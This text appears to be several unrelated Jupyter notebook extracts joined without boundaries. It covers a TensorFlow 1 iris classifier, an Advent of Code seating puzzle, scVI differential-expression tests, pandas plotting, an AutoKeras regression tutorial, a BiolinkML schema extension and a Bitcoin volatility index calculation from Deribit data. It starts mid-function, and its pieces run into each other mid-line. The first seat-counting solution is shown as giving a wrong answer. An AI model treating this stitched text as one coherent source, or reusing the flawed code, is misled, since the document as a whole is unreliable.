iris["data"] target = iris["target"] # Prepend the column of 1s for bias N, M = data.shape all_X = np.ones((N, M + 1)) all_X[:, 1:] = data # Convert into one-hot vectors num_labels = len(np.unique(target)) all_Y = np.eye(num_labels)[target] # One liner trick! return train_test_split(all_X, all_Y, test_size=0.33, random_state=RANDOM_SEED) def main(): train_X, test_X, train_y, test_y = get_iris_data() print("We are going to train a neural network") print("Be Patient") print ("We need to work hard on our data") # Layer's sizes x_size = train_X.shape[1] # Number of input nodes: 4 features and 1 bias #print(x_size,shape[1]) print("First we need to know X shape") print(train_X.shape[1]) print(train_X.shape[0]) print("Then wE need to know Y Shape") print(train_y.shape[1]) print(train_y.shape[0]) print(train_X) #print(train_y) h_size = 256 # Number of hidden nodes y_size = train_y.shape[1] # Number of outcomes (3 iris flowers) # Symbols X = tf.placeholder("float", shape=[None, x_size]) #X=tf.Variable(tf.ones(shape=[None, x_size]), dtype=tf.float32) y = tf.placeholder("float", shape=[None, y_size]) #y=tf.Variable(tf.ones(shape=[None, y_size]), dtype=tf.float32) # Weight initializations w_1 = init_weights((x_size, h_size)) w_2 = init_weights((h_size, y_size)) # Forward propagation yhat = forwardprop(X, w_1, w_2) predict = tf.argmax(yhat, axis=1) # Backward propagation cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=yhat)) updates = tf.train.GradientDescentOptimizer(0.01).minimize(cost) # Run SGD sess = tf.Session() init = tf.global_variables_initializer() sess.run(init) for epoch in range(100): # Train with each example for i in range(len(train_X)): sess.run(updates, feed_dict={X: train_X[i: i + 1], y: train_y[i: i + 1]}) train_accuracy = np.mean(np.argmax(train_y, axis=1) == sess.run(predict, feed_dict={X: train_X, y: train_y})) test_accuracy = np.mean(np.argmax(test_y, axis=1) == sess.run(predict, feed_dict={X: test_X, y: test_y})) print("Epoch = %d, train accuracy = %.2f%%, test accuracy = %.2f%%" % (epoch + 1, 100. * train_accuracy, 100. 
* test_accuracy)) sess.close() if __name__ == '__main__': main() pip install tensorflow==1.4.0 import tensorflow as tf # first, create a TensorFlow constant const = tf.constant(2.0, name="const") # create TensorFlow variables b = tf.Variable(2.0, name='b') c = tf.Variable(1.0, name='c') print(b) print(c) # now create some operations d = tf.add(b, c, name='d') e = tf.add(c, const, name='e') a = tf.multiply(d, e, name='a') # setup the variable initialisation #init_op = tf.global_variables_initializer() !pip install tensorflow==1.12.0 import tensorflow as tf print(tf.__version__) import tensorflow as tf print(tf.__version__)1.12.0Part 2def check_diagonal(array, row, col, rotate=False): if rotate: row = len(array) - 1 - row diag = np.diagonal(np.rot90(array), offset=col - row)[::-1] else: diag = np.diagonal(array, offset=col - row) return check_both_sides(diag, min(row, col)) def check_both_sides(vector, seat_idx): left = "".join(vector[:seat_idx]).replace(".", "") right = "".join(vector[seat_idx + 1:]).replace(".", "") left_occupied = 1 if left.endswith("#") else 0 right_occupied = 1 if right.startswith("#") else 0 return left_occupied + right_occupied def count_visible(array, row, col): visible = 0 visible += check_both_sides(array[row], col) # Check horizontally visible += check_both_sides(array[:, col], row) # Check vertically visible += check_diagonal(array, row, col, rotate=False) # Check diagonally visible += check_diagonal(array, row, col, rotate=True) # Check diagonally (rotated) return visible def transform_seat_pt2(array, row, col): seat_status = array[row, col] if seat_status == "L" and count_visible(array, row, col) == 0: return "#" elif seat_status == "#" and count_visible(array, row, col) >= 5: return "L" elif seat_status == ".": return "." else: return seat_status with open(INPUT_PATH / "day11_input.txt", "r") as f: array = [[c for c in l.rstrip()] for l in f.readlines()] out = musical_chairs(array, transform_seat_pt2, True, True)1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 Stopped after 72 updates. 2422 occupied seatsSeems to be a Heisenbug somewhere since the code produces the expected result for the example array...Answer should be 2023 after 85 updates :( RetryThis is a nice solution: https://github.com/davepage-mcr/aoc2020/blob/main/day11/seats.pydef count_visible_v2(array, row, col): neighbours = 0 # Look for first seat in 8 cardinal directions from (col, row) for dc, dr in [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, +1), (0, 1), (1, 1)]: occupied = False r = row + dr c = col + dc while r >= 0 and r < len(array) and c >= 0 and c < len(array[0]): if array[r][c] == '#': occupied = True break elif array[r][c] == 'L': break r += dr c += dc if occupied: neighbours += 1 return (neighbours) def transform_seat_pt2_v2(array, row, col): seat_status = array[row][col] if seat_status == "L" and count_visible_v2(array, row, col) == 0: return "#" elif seat_status == "#" and count_visible_v2(array, row, col) >= 5: return "L" elif seat_status == ".": return "." else: return seat_status out = musical_chairs(array, transform_seat_pt2_v2)Stopped after 85 updates. 2023 occupied seatsDifferential Expression DevelopmentTesting various functions for differential expression analysis. 
Importsfrom IPython.core.display import display, HTML import warnings warnings.filterwarnings('ignore') display(HTML("")) repo_path = '/Users/mincheolkim/Github/' data_path = '/Users/mincheolkim/Documents/' import sys sys.path.append(repo_path + 'scVI') sys.path.append(repo_path + 'scVI-extensions') import os import numpy as np from sklearn.manifold import TSNE import matplotlib %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns from scipy.ndimage.filters import gaussian_filter import pandas as pd import torch import imp from scipy.stats import ttest_ind, wasserstein_distance, ks_2samp from scipy.stats import norm from scvi.metrics.clustering import entropy_batch_mixing, get_latent from scvi.models import VAE, SVAEC, VAEC from scvi.inference import VariationalInference import scvi_extensions.dataset.supervised_data_loader as sdl import scvi_extensions.dataset.cropseq as cs import scvi_extensions.inference.supervised_variational_inference as svi import scvi_extensions.hypothesis_testing.mean as mn import scvi_extensions.hypothesis_testing.utils as utils import scvi_extensions.dataset.label_data_loader as ldlCreate a dataseth5_filename = '/Users/mincheolkim/Documents/raw_gene_bc_matrices_h5.h5' abridged_metadata_filename = data_path + 'batf_nc_metadata.txt' imp.reload(cs) # Load the dataset gene_dataset = cs.CropseqDataset( filename=h5_filename, metadata_filename=abridged_metadata_filename, new_n_genes=1000, use_donors=True, use_labels='guide', save_path='') imp.reload(cs) # Load the dataset gene_dataset_de = cs.CropseqDataset( filename=h5_filename, metadata_filename=abridged_metadata_filename, new_n_genes=1000, use_donors=True, use_labels='guide', testing_labels='guide', save_path='')Preprocessing CROP-seq dataset Number of cells kept after filtering with metadata: 1400 Number of cells kept after removing all zero cells: 1400 Finished preprocessing CROP-seq dataset Downsampling from 32738 to 1000 genesUseful functionsdef plot_pair_densities(vae, inference, n_points=1000, sigma=1.5): latent, batch_indices, labels = get_latent(vae, inference.data_loaders['sequential']) latent, idx_t_sne = inference.apply_t_sne(latent, n_points) batch_indices = batch_indices[idx_t_sne].ravel() labels = labels[idx_t_sne].ravel() plt.figure(figsize=(10, 20)) for label, guide in enumerate(inference.gene_dataset.guide_lookup): guide_latent = latent[labels == label, :] guide_heatmap, guide_xedges, guide_yedges = np.histogram2d(guide_latent[:, 0], guide_latent[:, 1], bins=30) guide_heatmap = gaussian_filter(guide_heatmap, sigma=sigma) plt.subplot(1, len(inference.gene_dataset.guide_lookup)+1, label+1) plt.imshow(guide_heatmap.T, extent=None, origin='lower', cmap=matplotlib.cm.jet, aspect=1) plt.title(guide) plt.show()Supervised trainingn_epochs=200 lr=1e-4 use_batches=True use_cuda=False vaec = VAEC(gene_dataset.nb_genes, n_labels=gene_dataset.n_labels, n_batch=gene_dataset.n_batches * use_batches) supervised_infer = svi.SupervisedVariationalInference( vaec, gene_dataset, train_size=0.9, use_cuda=use_cuda, verbose=False, frequency=1) supervised_infer.train(n_epochs=n_epochs, lr=lr) torch.save(vaec, '/Users/mincheolkim/Documents/vaec_batf_nc.model') vaec = torch.load('/Users/mincheolkim/Documents/vaec_batf_nc.model', lambda storage, loc: storage) plt.plot(supervised_infer.history['ll_test']) plt.title('Test loss') plt.ylabel('ll') plt.xlabel('iter') plot_pair_densities(vaec, supervised_infer, n_points=5000, sigma=2)Differential ExpressionI test out some ways to perform differential 
expression.First, I use scVI's method directly to compare any DE genes between BATF and control (there aren't any, in their definition) Default method for differential expressionimp.reload(mn) null_rates, de_results = mn.differential_expression(vaec, gene_dataset_de, [0, 1], 100) gene_dataset_de.guide_lookup de_results[0][1].head(5) de_results[0][1].tail(5)Looking at distribution of Bayes factors for a gene and cell typeimp.reload(mn) h1_bayes_factors, h0_bayes_factors = mn.batch_differential_expression( vaec, gene_dataset_de, M_sampling=100, desired_labels=[0, 1]) plt.figure(figsize=(15, 5)); plt.subplot(1, 2, 1); sns.distplot(h0_bayes_factors[:, 410], kde=False, bins=20) sns.distplot(h1_bayes_factors[:, 410], kde=False, bins=20) plt.legend(['Null', 'Alternate']); plt.title('Sampling distribution of Bayes factors (SAP18)'); plt.xlabel('Bayes Factor');plt.ylabel('count'); plt.subplot(1, 2, 2); sns.distplot(h0_bayes_factors[:, 336], kde=False, bins=20) sns.distplot(h1_bayes_factors[:, 336], kde=False, bins=20) plt.legend(['Null', 'Alternate']); plt.title('Sampling distribution of Bayes factors (LSM3)'); plt.xlabel('Bayes Factor');plt.ylabel('count'); plt.savefig('/Users/mincheolkim/Documents/scvi_outputs/labmeeting/de_bf_sampling_dist.png', bbox='tight')/anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been " /anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been " /anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been " /anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been "import numpy as np import pandas as pd import seaborn as sns sns.set_style('darkgrid') df1 = pd.read_csv('df1.csv', index_col=0) df2 = pd.read_csv('df2.csv') df1 df2 df1['A'].hist(bins=30, grid=False, figsize=(10,5)) df2.plot.area(figsize=(10,5), alpha=0.4) df2.plot.bar(figsize=(10,5), stacked=True) #index should be categorical for barplots df1.plot.scatter(x='A', y='B', s=df1['C']*100, figsize=(10,5)); df2.plot.box() #use sns for boxplot df = pd.DataFrame(np.random.randn(1000,2), columns=['A', 'B']) df.head() df.plot.hexbin(x='A', y='B', gridsize=25, cmap='coolwarm', figsize=(10,10)) df2['a'].plot.kde() df2.plot.density()A Simple ExampleThe first step is to prepare your data. 
Here we use the [California housingdataset](https://scikit-learn.org/stable/datasets/index.htmlcalifornia-housing-dataset) as an example.from sklearn.datasets import fetch_california_housing import numpy as np import pandas as pd import tensorflow as tf import autokeras as ak house_dataset = fetch_california_housing() df = pd.DataFrame( np.concatenate(( house_dataset.data, house_dataset.target.reshape(-1,1)), axis=1), columns=house_dataset.feature_names + ['Price']) train_size = int(df.shape[0] * 0.9) df[:train_size].to_csv('train.csv', index=False) df[train_size:].to_csv('eval.csv', index=False) train_file_path = 'train.csv' test_file_path = 'eval.csv'The second step is to run the[StructuredDataRegressor](/structured_data_regressor).# Initialize the structured data regressor. reg = ak.StructuredDataRegressor( overwrite=True, max_trials=3) # It tries 10 different models. # Feed the structured data regressor with training data. reg.fit( # The path to the train.csv file. train_file_path, # The name of the label column. 'Price', epochs=10) # Predict with the best model. predicted_y = reg.predict(test_file_path) # Evaluate the best model with testing data. print(reg.evaluate(test_file_path, 'Price'))Data FormatThe AutoKeras StructuredDataRegressor is quite flexible for the data format.The example above shows how to use the CSV files directly. Besides CSV files, it alsosupports numpy.ndarray, pandas.DataFrame or [tf.data.Dataset](https://www.tensorflow.org/api_docs/python/tf/data/Dataset?version=stable). The data should betwo-dimensional with numerical or categorical values.For the regression targets, it should be a vector of numerical values.AutoKeras accepts numpy.ndarray, pandas.DataFrame, or pandas.Series.The following examples show how the data can be prepared with numpy.ndarray,pandas.DataFrame, and tensorflow.data.Dataset.import pandas as pd import numpy as np # x_train as pandas.DataFrame, y_train as pandas.Series x_train = pd.read_csv(train_file_path) print(type(x_train)) # pandas.DataFrame y_train = x_train.pop('Price') print(type(y_train)) # pandas.Series # You can also use pandas.DataFrame for y_train. y_train = pd.DataFrame(y_train) print(type(y_train)) # pandas.DataFrame # You can also use numpy.ndarray for x_train and y_train. x_train = x_train.to_numpy().astype(np.unicode) y_train = y_train.to_numpy() print(type(x_train)) # numpy.ndarray print(type(y_train)) # numpy.ndarray # Preparing testing data. x_test = pd.read_csv(test_file_path) y_test = x_test.pop('Price') # It tries 10 different models. reg = ak.StructuredDataRegressor(max_trials=3, overwrite=True) # Feed the structured data regressor with training data. reg.fit(x_train, y_train, epochs=10) # Predict with the best model. predicted_y = reg.predict(x_test) # Evaluate the best model with testing data. print(reg.evaluate(x_test, y_test))The following code shows how to convert numpy.ndarray to tf.data.Dataset.train_set = tf.data.Dataset.from_tensor_slices((x_train, y_train)) test_set = tf.data.Dataset.from_tensor_slices((x_test.to_numpy().astype(np.unicode), y_test)) reg = ak.StructuredDataRegressor(max_trials=3, overwrite=True) # Feed the tensorflow Dataset to the regressor. reg.fit(train_set, epochs=10) # Predict with the best model. predicted_y = reg.predict(test_set) # Evaluate the best model with testing data. 
print(reg.evaluate(test_set))You can also specify the column names and types for the data as follows.The `column_names` is optional if the training data already have the column names, e.g.pandas.DataFrame, CSV file.Any column, whose type is not specified will be inferred from the training data.# Initialize the structured data regressor. reg = ak.StructuredDataRegressor( column_names=[ 'MedInc', 'HouseAge', 'AveRooms', 'AveBedrms', 'Population', 'AveOccup', 'Latitude', 'Longitude'], column_types={'MedInc': 'numerical', 'Latitude': 'numerical'}, max_trials=10, # It tries 10 different models. overwrite=True, )Validation DataBy default, AutoKeras use the last 20% of training data as validation data.As shown in the example below, you can use `validation_split` to specify the percentage.reg.fit(x_train, y_train, # Split the training data and use the last 15% as validation data. validation_split=0.15, epochs=10)You can also use your own validation setinstead of splitting it from the training data with `validation_data`.split = 500 x_val = x_train[split:] y_val = y_train[split:] x_train = x_train[:split] y_train = y_train[:split] reg.fit(x_train, y_train, # Use your own validation set. validation_data=(x_val, y_val), epochs=10)Customized Search SpaceFor advanced users, you may customize your search space by using[AutoModel](/auto_model/automodel-class) instead of[StructuredDataRegressor](/structured_data_regressor). You can configure the[StructuredDataBlock](/block/structureddatablock-class) for some high-levelconfigurations, e.g., `categorical_encoding` for whether to use the[CategoricalToNumerical](/block/categoricaltonumerical-class). You can also do not specify thesearguments, which would leave the different choices to be tuned automatically. Seethe following example for detail.import autokeras as ak input_node = ak.StructuredDataInput() output_node = ak.StructuredDataBlock(categorical_encoding=True)(input_node) output_node = ak.RegressionHead()(output_node) reg = ak.AutoModel( inputs=input_node, outputs=output_node, overwrite=True, max_trials=3) reg.fit(x_train, y_train, epochs=10)The usage of [AutoModel](/auto_model/automodel-class) is similar to the[functional API](https://www.tensorflow.org/guide/keras/functional) of Keras.Basically, you are building a graph, whose edges are blocks and the nodes are intermediate outputs of blocks.To add an edge from `input_node` to `output_node` with`output_node = ak.[some_block]([block_args])(input_node)`.You can even also use more fine grained blocks to customize the search space evenfurther. See the following example.import autokeras as ak input_node = ak.StructuredDataInput() output_node = ak.CategoricalToNumerical()(input_node) output_node = ak.DenseBlock()(output_node) output_node = ak.RegressionHead()(output_node) reg = ak.AutoModel(inputs=input_node, outputs=output_node, max_trials=3, overwrite=True) reg.fit(x_train, y_train, epochs=10)You can also export the best model found by AutoKeras as a Keras Model.model = reg.export_model() model.summary() model.predict(x_train)How to extend a biolink modeling language (BiolinkML) model!pip install -q yamlmagic !pip install -q .. %load_ext yamlmagic %%yaml model # Every model must have a globally unique URI. 
This is the external name of the model id: http://example.org/examples/distributeExample # Every model should also have a globally unique name (well, global within the context of the particular modeling environment) name: dist1 # Descriptions are always useful, but not required description: A toy extension to the base biolink model # Versions are recommended but not required. The version is copied into the output artifacts. An error will be raised # if two different versions of the same model are imported version: 0.0.1 # A license is not required at this point -- should it be? license: https://creativecommons.org/publicdomain/zero/1.0/ # Prefixes can be assigned specifically. We define two below: # biolink -- the prefix used by the biolink-model # dist1 -- the URI prefix used by this example. Note that the dist1 prefix may or may not align with the model id prefixes: biolink: https://w3id.org/biolink/vocab/ biolinkml: https://w3id.org/biolink/biolinkml/ dist: http://example.org/examples/dist1# # Prefixes can also be pulled from a prefixcommons compliant site. The map below uses the definitions found in # https://github.com/prefixcommons/biocontext/blob/master/registry/semweb_context.yaml. default_curi_maps: - semweb_context # The default prefix is what is used in the subsets, types, slots, classes sections below if not otherwise supplied default_prefix: dist default_range: string # The list of prefixes to emit target files. Note that all prefixes that are used elsewhere in the model are automatically # emitted, with the exception of emit_prefixes: - skos - rdf - dist # List of models to import. Note that import specifications can (currently) be URI's, absolute (file://...file), curies # (biolink:model), or relative (includes/myfile) file names. Note, however, that this latter form is being deprecated. # The location of imported files can now be specified in an accompanying mapping file. The imports below reference: # https://w3id.org/biolink/biolink-model -- the biolink model # https://w3id.org/biolink/biolinkml/types -- the biolink modeling language types definitions imports: - https://w3id.org/biolink/biolink-model - biolinkml:types # Subsets that are defined in this model extension subsets: experimental: # A subset should have a description description: model elements that have not yet been tested # Types that are defined in this model extension types: gene sequence: uri: dist:seq typeof: string description: A gene sequence # Slots that are defined in this model extension slots: gene has sequence: description: A gene pattern domain: gene range: gene sequence slot_uri: dist:hasSeq required: true # Classes that are defined in this model extension classes: # The class name. For most generators, this will be transformed to CamelCase (MyGene) my gene: description: This is an example extension. Doesn't do a lot is_a: gene slots: - gene has sequence from biolinkml.generators.pythongen import PythonGenerator from logging import ERROR # Note: Jupyter appears to generate output even if the log_level is set. 
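# Added note: the two calls below consume the YAML model defined in the %%yaml cell
# above. PythonGenerator builds a code generator from that schema, and serialize()
# returns the generated Python module (dataclasses for the model's classes and slots)
# as a string -- its output is reproduced below.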
gen = PythonGenerator(model, log_level=ERROR) print(gen.serialize())# Auto generated from None by pythongen.py version: 0.3.0 # Generation date: 2019-10-23 14:25 # Schema: dist1 # # id: http://example.org/examples/distributeExample # description: A toy extension to the base biolink model # license: https://creativecommons.org/publicdomain/zero/1.0/ from typing import Optional, List, Union, Dict, ClassVar from dataclasses import dataclass from biolinkml.utils.metamodelcore import empty_list, empty_dict, bnode from biolinkml.utils.yamlutils import YAMLRoot from biolinkml.utils.formatutils import camelcase, underscore, sfx from rdflib import Namespace, URIRef from biolinkml.utils.curienamespace import CurieNamespace from biolink.model import AnatomicalEntityId, BiologicalSequence, DiseaseOrPhenotypicFeatureId, Gene, GeneId, GeneOrGeneProductId, GeneProductId, GenomicEntityId, IdentifierType, IriType, LabelType, MolecularEntityId, NamedThingId, NarrativeText, OrganismTaxonId, PhenotypicFeatureId, SymbolType, TranscriptId from biolinkml.utils.metamodelcore[...]Volatility Indices Calculation This notebook explains how the module *vxbt_calc* calculates the XVBT, AXVBT and GXVBT indices using data from Deribit.import calendar import numpy as np import openapi_client as dbitApi import pandas as pd from datetime import datetimeUtility functions for time calculations, Deribit API and dataframe formattingdef format_datetime_to_expiry(date): return datetime.strftime(date, '%-d%b%y').upper() def get_near_next_terms(now): c = calendar.Calendar(firstweekday=calendar.MONDAY) this_month_cal = c.monthdatescalendar(now.year, now.month) this_fridays = [datetime(day.year, day.month, day.day, 8, 0, 0) for week in this_month_cal for day in week if day.weekday() == calendar.FRIDAY and day.month == now.month and datetime(day.year, day.month, day.day, 8, 0, 0) >= now] next_year = now.year if now.month < 12 else now.year + 1 next_month = now.month + 1 if now.month < 12 else 1 next_month_cal = c.monthdatescalendar(next_year, next_month) next_fridays = [datetime(day.year, day.month, day.day, 8, 0, 0) for week in next_month_cal for day in week if day.weekday() == calendar.FRIDAY and day.month == next_month and datetime(day.year, day.month, day.day, 8, 0, 0) >= now] fridays = this_fridays + next_fridays near_term, next_term = fridays[0], fridays[1] return (format_datetime_to_expiry(near_term), format_datetime_to_expiry(next_term), near_term, next_term) def get_index(currency='BTC'): try: index_result = api.public_get_index_get(currency)['result'][currency] return index_result except dbitApi.exceptions.ApiException as e: print(e) #logger.exception('Exception when calling MarketDataApi->public_get_instruments_get!') exit() def get_instruments_with_expiry(expiry, currency='BTC', kind='option', expired='false'): try: instrument_result = api.public_get_instruments_get(currency, kind=kind, expired=expired)['result'] return [instrument['instrument_name'] for instrument in instrument_result if expiry in instrument['instrument_name']] except dbitApi.exceptions.ApiException as e: print(e) #logger.exception('Exception when calling MarketDataApi->public_get_instruments_get!') exit() def get_ticker(instrument): try: instrument_result = api.public_ticker_get(instrument)['result'] return instrument_result except dbitApi.exceptions.ApiException as e: print(e) #logger.exception('Exception when calling MarketDataApi->public_get_instruments_get!') exit() def get_bids_asks(near_list, next_list): near_calls = dict() near_puts = dict() 
next_calls = dict() next_puts = dict() for instrument in near_list: data = get_ticker(instrument) best_bid, best_ask = data['best_bid_price'], data['best_ask_price'] strike, cp = int(instrument.split('-')[2]), instrument.split('-')[3] if cp == 'C': near_calls[strike] = {'best_bid': best_bid, 'best_ask': best_ask} elif cp == 'P': near_puts[strike] = {'best_bid': best_bid, 'best_ask': best_ask} else: print(f'Error {instrument}') for instrument in next_list: data = get_ticker(instrument) best_bid, best_ask = data['best_bid_price'], data['best_ask_price'] strike, cp = int(instrument.split('-')[2]), instrument.split('-')[3] if cp == 'C': next_calls[strike] = {'best_bid': best_bid, 'best_ask': best_ask} elif cp == 'P': next_puts[strike] = {'best_bid': best_bid, 'best_ask': best_ask} else: print(f'Error {instrument}') near_calls_df = pd.DataFrame.from_dict(near_calls, orient='index').sort_index().replace(0, np.nan) near_puts_df = pd.DataFrame.from_dict(near_puts, orient='index').sort_index().replace(0, np.nan) next_calls_df = pd.DataFrame.from_dict(next_calls, orient='index').sort_index().replace(0, np.nan) next_puts_df = pd.DataFrame.from_dict(next_puts, orient='index').sort_index().replace(0, np.nan) return near_calls_df, near_puts_df, next_calls_df, next_puts_dfXVBT ImplementationReplication of CBOE VIX calculation.Near and next term expiries are defined as the next two Fridays respectively. Bid/ask data for all strike puts and calls are retrieved from Deribit for these expiries.api = dbitApi.MarketDataApi() now = datetime.now() near_expiry, next_expiry, near_datetime, next_datetime = get_near_next_terms(now) print(near_expiry, next_expiry) near_instruments = get_instruments_with_expiry(near_expiry) next_instruments = get_instruments_with_expiry(next_expiry) near_calls_df, near_puts_df, next_calls_df, next_puts_df = get_bids_asks(near_instruments, next_instruments) near_calls_dfStep 1: Select the options to be used in the VIX Index calculationCall and put prices are computed as the average of the respective bid and ask prices. The strike at which the call and put price difference is found to calculate forward prices and separation strikes.near_prices = pd.DataFrame(index=near_calls_df.index) near_prices['call_price'] = (near_calls_df['best_bid'] + near_calls_df['best_ask']) / 2 near_prices['put_price'] = (near_puts_df['best_bid'] + near_puts_df['best_ask']) / 2 near_prices['abs_diff'] = abs(near_prices['call_price'] - near_prices['put_price']) min_near_strike = near_prices['abs_diff'].idxmin() min_near_diff = near_prices.loc[min_near_strike].abs_diff next_prices = pd.DataFrame(index=next_calls_df.index) next_prices['call_price'] = (next_calls_df['best_bid'] + next_calls_df['best_ask']) / 2 next_prices['put_price'] = (next_puts_df['best_bid'] + next_puts_df['best_ask']) / 2 next_prices['abs_diff'] = abs(next_prices['call_price'] - next_prices['put_price']) min_next_strike = next_prices['abs_diff'].idxmin() min_next_diff = next_prices.loc[min_next_strike].abs_diff near_pricesThe XVBT index is set to have a constant maturity of seven days and a yield rate of zero (which should not make a difference to calculations - refer to Alexander paper page 9). 
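For reference, the quantities computed in the next cells mirror the CBOE VIX white paper (a sketch in the white paper's notation: $K^{*}$ is the strike with the smallest call-put price difference, $R$ the yield rate, $T$ the time to expiration, $Q(K_i)$ the bid-ask midpoint at strike $K_i$, and $\Delta K_i$ half the distance between the strikes adjacent to $K_i$, one-sided at the edges):

$$F = K^{*} + e^{RT}\bigl(C(K^{*}) - P(K^{*})\bigr), \qquad K_0 = \text{first strike at or below } F,$$

and, per expiry (used in Step 2 below),

$$\sigma^2 = \frac{2}{T}\sum_i \frac{\Delta K_i}{K_i^{2}}\, e^{RT} Q(K_i) \;-\; \frac{1}{T}\left(\frac{F}{K_0} - 1\right)^{2}.$$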
This is used to calculate forward prices f1, f2 and separation strikes k0_1, k0_2.const_mature_days = 7 R = 0 n1 = (near_datetime - now).total_seconds() / 60 n2 = (next_datetime - now).total_seconds() / 60 nY = 525600 n = const_mature_days * 24 * 60 t1 = n1/nY t2 = n2/nY # Compute forward prices and at-the-money strikes f1 = min_near_strike + np.e**(R*t1) * min_near_diff k0_1 = max([strike for strike in near_prices.index if strike <= min_near_strike]) f2 = min_next_strike + np.e**(R*t2) * min_next_diff k0_2 = max([strike for strike in next_prices.index if strike <= min_next_strike]) print(k0_1, f1, k0_2, f2)7750 7750.00225 7750 7750.003Out of the money calls and puts are found by using the calculated separation strikes and excluding at the money strikes.near_otm_puts_df = near_puts_df.loc[:k0_1][:-1] near_otm_calls_df = near_calls_df.loc[k0_1:][1:] next_otm_puts_df = next_puts_df.loc[:k0_2][:-1] next_otm_calls_df = next_calls_df.loc[k0_2:][1:] near_otm_puts_df near_otm_calls_dfStrikes following two consecutive bid prices and strikes with zero bids are excluded.near_otm_puts_df = near_otm_puts_df.sort_index(ascending=False) near_otm_puts_df = near_otm_puts_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) near_otm_puts_df['zero_bid_cumsum'] = near_otm_puts_df['zero_bid'].cumsum() near_otm_puts_df = near_otm_puts_df[(near_otm_puts_df['zero_bid_cumsum'] <= 2) & (near_otm_puts_df['best_bid'] > 0)] near_otm_puts_df near_otm_calls_df = near_otm_calls_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) near_otm_calls_df['zero_bid_cumsum'] = near_otm_calls_df['zero_bid'].cumsum() near_otm_calls_df = near_otm_calls_df[(near_otm_calls_df['zero_bid_cumsum'] <= 2) & (near_otm_calls_df['best_bid'] > 0)] near_otm_calls_df next_otm_puts_df = next_otm_puts_df.sort_index(ascending=False) next_otm_puts_df = next_otm_puts_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) next_otm_puts_df['zero_bid_cumsum'] = next_otm_puts_df['zero_bid'].cumsum() next_otm_puts_df = next_otm_puts_df[(next_otm_puts_df['zero_bid_cumsum'] <= 2) & (next_otm_puts_df['best_bid'] > 0)] next_otm_calls_df = next_otm_calls_df.assign(zero_bid=lambda df: (df['best_bid'] == 0).astype(int)) next_otm_calls_df['zero_bid_cumsum'] = next_otm_calls_df['zero_bid'].cumsum() next_otm_calls_df = next_otm_calls_df[(next_otm_calls_df['zero_bid_cumsum'] <= 2) & (next_otm_calls_df['best_bid'] > 0)] next_otm_puts_df next_otm_calls_dfStep 2: Calculate volatility for both near-term and next-term optionsRefer to VIX white paper page 8.near_calc_strikes_df = pd.DataFrame(index=near_prices.index) near_calc_strikes_df['price'] = (near_otm_puts_df['best_bid'] + near_otm_puts_df['best_ask']) / 2 near_calc_strikes_df['price'] = near_calc_strikes_df.price.combine_first((near_otm_calls_df['best_bid'] + near_otm_calls_df['best_ask']) / 2) near_calc_strikes_df.at[k0_1] = (near_prices.loc[k0_1].call_price + near_prices.loc[k0_1].put_price) / 2 near_calc_strikes_df = near_calc_strikes_df.dropna() near_calc_strikes_df next_calc_strikes_df = pd.DataFrame(index=next_prices.index) next_calc_strikes_df['price'] = (next_otm_puts_df['best_bid'] + next_otm_puts_df['best_ask']) / 2 next_calc_strikes_df['price'] = next_calc_strikes_df.price.combine_first((next_otm_calls_df['best_bid'] + next_otm_calls_df['best_ask']) / 2) next_calc_strikes_df.at[k0_2] = (next_prices.loc[k0_2].call_price + next_prices.loc[k0_2].put_price) / 2 next_calc_strikes_df = next_calc_strikes_df.dropna() next_calc_strikes_df near_sum = 0 for i in 
range(len(near_calc_strikes_df)): row = near_calc_strikes_df.iloc[i] if i == 0: deltaKi = near_calc_strikes_df.iloc[i+1].name - row.name elif i == len(near_calc_strikes_df) - 1: deltaKi = row.name - near_calc_strikes_df.iloc[i-1].name else: deltaKi = (near_calc_strikes_df.iloc[i+1].name - near_calc_strikes_df.iloc[i-1].name) / 2 near_sum += deltaKi/(row.name ** 2) * np.e**(R*t1) * row.price next_sum = 0 for i in range(len(next_calc_strikes_df)): row = next_calc_strikes_df.iloc[i] if i == 0: deltaKi = next_calc_strikes_df.iloc[i+1].name - row.name elif i == len(next_calc_strikes_df) - 1: deltaKi = row.name - next_calc_strikes_df.iloc[i-1].name else: deltaKi = (next_calc_strikes_df.iloc[i+1].name - next_calc_strikes_df.iloc[i-1].name) / 2 next_sum += deltaKi/(row.name ** 2) * np.e**(R*t2) * row.price sigma1 = ((2/t1) * near_sum) - (1/t1)*((f1/k0_1 - 1)**2) sigma2 = ((2/t2) * next_sum) - (1/t2)*((f2/k0_2 - 1)**2) print(sigma1, sigma2) VXBT = 100 * np.sqrt(((t1*sigma1)*((n2-n)/(n2-n1)) + (t2*sigma2)*((n-n1)/(n2-n1)))*(nY/n)) VXBTAVXBT and GVXBT ImplementationRefer to *'The Crypto Investor Fear Gauge and the Bitcoin Variance Risk Premium'* by and .omega = ((n2-nY)/(n2-n1))*n GVXBT = np.sqrt(omega*t1*sigma1 + (1-omega)*t2*sigma2) GVXBT sigma1_a = sigma1 * (f1**-2) sigma2_a = sigma2 * (f2**-2) AVXBT = np.sqrt(omega*t1*sigma1_a + (1-omega)*t2*sigma2_a) AVXBT*** Test implementation 